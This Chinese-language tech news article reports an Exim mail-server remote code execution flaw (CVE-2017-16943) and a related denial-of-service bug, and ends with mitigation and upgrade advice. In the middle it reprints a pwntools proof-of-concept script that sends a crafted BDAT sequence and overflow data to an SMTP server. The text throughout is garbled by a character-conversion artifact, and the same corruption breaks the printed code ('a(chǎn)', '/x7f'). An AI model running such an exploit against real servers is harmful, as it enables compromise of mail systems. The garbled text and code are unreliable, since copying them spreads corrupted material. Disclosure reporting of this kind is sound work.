互聯(lián)網(wǎng)半數(shù)郵件服務(wù)器可被遠(yuǎn)程代碼執(zhí)行，超40萬(wàn)臺(tái)服務(wù)器受影響

臺(tái)灣安全公司 DEVCORE 的研究人員 Meh 于近期發(fā)現(xiàn)互聯(lián)網(wǎng)郵件傳輸代理（MTA）軟件 Exim 存在一處關(guān)鍵漏洞（CVE-2017-16943），允許黑客向 SMTP 服務(wù)器發(fā)送 BDAT 命令，從而觸發(fā)漏洞后遠(yuǎn)程執(zhí)行任意代碼。調(diào)查顯示，有超過(guò) 40 萬(wàn)臺(tái)服務(wù)器的分塊功能已遭該漏洞影響。

Exim 是劍橋大學(xué)開發(fā)的一款基于 GPL 協(xié)議的開放源代碼軟件，其主要用于連接互聯(lián)網(wǎng) Unix 系統(tǒng)的消息傳輸代理（MTA）服務(wù)器。目前，據(jù)三月份進(jìn)行的一百多萬(wàn)臺(tái)郵件服務(wù)器的分析表明，超過(guò) 56% 的用戶正在使用 Exim 軟件。

調(diào)查顯示，該漏洞由一臺(tái)公共bug跟蹤器檢測(cè)發(fā)現(xiàn)并在補(bǔ)丁發(fā)布之前意外披露。一旦黑客惡意利用，其系統(tǒng)將會(huì)處于崩潰狀態(tài)，因?yàn)樵摵瘮?shù)指針的receive_getc并未被重置。以下是該漏洞部分概念驗(yàn)證代碼（PoC）顯示：

# pip install pwntools
from pwn import *

r = remote(‘localhost’, 25)

r.recvline()
r.sendline(“EHLO test”)
r.recvuntil(“250 HELP”)
r.sendline(“MAIL FROM:<[email protected]>”)
r.recvline()
r.sendline(“RCPT TO:<[email protected]>”)
r.recvline()
#raw_input()
r.sendline(‘a(chǎn)’*0x1100+’/x7f’)
#raw_input()
r.recvuntil(‘command’)
r.sendline(‘BDAT 1’)
r.sendline(‘:BDAT /x7f’)
s = ‘a(chǎn)’*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ‘:/r/n’)
r.recvuntil(‘command’)
#raw_input()
r.send(‘/n’)
r.interactive()
exit()

雖然跟蹤器會(huì)警示 Exim 軟件存在漏洞，但根據(jù)用戶習(xí)慣來(lái)看告警通知極有可能被忽略。不過(guò)，現(xiàn)開發(fā)人員已采取安全措施防止此類事件惡意發(fā)展，并提醒運(yùn)行 Exim 4.88 或更高版本的用戶將其主要配置參數(shù) chunking_advertise_hosts 設(shè)置為空值，從而禁用 ESMTP 擴(kuò)展、使 BDAT 無(wú)法使用，以便關(guān)閉易受攻擊程序。

另外，研究人員發(fā)現(xiàn)的另一個(gè)漏洞（CVE-2017-16944）能夠允許黑客利用 BDAT 命令與惡意函數(shù)遠(yuǎn)程開展拒絕服務(wù)（DoS）攻擊。該漏洞影響了 Exim 4.88 和 4.89 中的 SMTP 后臺(tái)進(jìn)程。對(duì)此，研究人員建議系統(tǒng)管理人員盡快更新至 Exim 4.90 版本，以防可能的黑客惡意攻擊。